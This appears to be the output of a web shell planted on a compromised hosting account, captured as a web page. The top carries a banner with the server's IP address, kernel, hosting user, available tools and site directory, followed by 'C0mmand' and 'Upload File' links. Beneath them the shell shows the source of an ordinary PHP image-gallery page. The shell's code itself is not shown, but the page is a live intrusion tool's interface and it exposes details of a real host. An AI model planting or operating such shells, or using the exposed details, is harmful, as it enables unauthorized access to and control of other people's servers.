Server IP : 103.53.40.154 / Your IP : 18.217.224.165 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/greenenvirofoundation.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<style> .gallery-image{ padding:10px; box-shadow: 0 3px 6px rgba(0,0,0,0.16), 0 3px 6px rgba(0,0,0,0.23); border-radius:10px; } </style> <div class="container pt-30 pb-30"> <div class="text-center"> <div class="testimonial__head-wrp mb-20"> <div class="section-header m-0"> <!--<h5 class="wow fadeInUp" data-wow-duration="1.2s" data-wow-delay=".2s"><img--> <!-- src="assets/images/icon/leaf.svg" alt="image"> our Gallery--> <!--</h5>--> <h2 class="wow fadeInUp" data-wow-duration="1.4s" data-wow-delay=".4s">Green Enviro Gallery</h2> </div> <div class="dot-wrp wow fadeInUp mt-5 mt-sm-0" data-wow-duration="1.6s" data-wow-delay=".6s"> <div class="dot testimonial__dot"></div> </div> </div> </div> <div class="row"> <?php $sql = "SELECT * FROM `tbl_gallery`"; $run = mysqli_query($db,$sql) or die("Query Not run"); $count=0; while($data = mysqli_fetch_assoc($run)){ if(mysqli_num_rows($run) > 0){ $count++; ?> <div class="col-xxl-3 col-xl-3 col-lg-6 col-md-12 mb-3"> <div class="gallery-image"> <img src="<?php echo $wspath?>admin/images/gallery/<?php echo $data['image']?>" alt="" title="" width="100%"> </div> </div> <?php }else{ echo "<h1>No Data Found</h1>"; } } ?> </div> </div>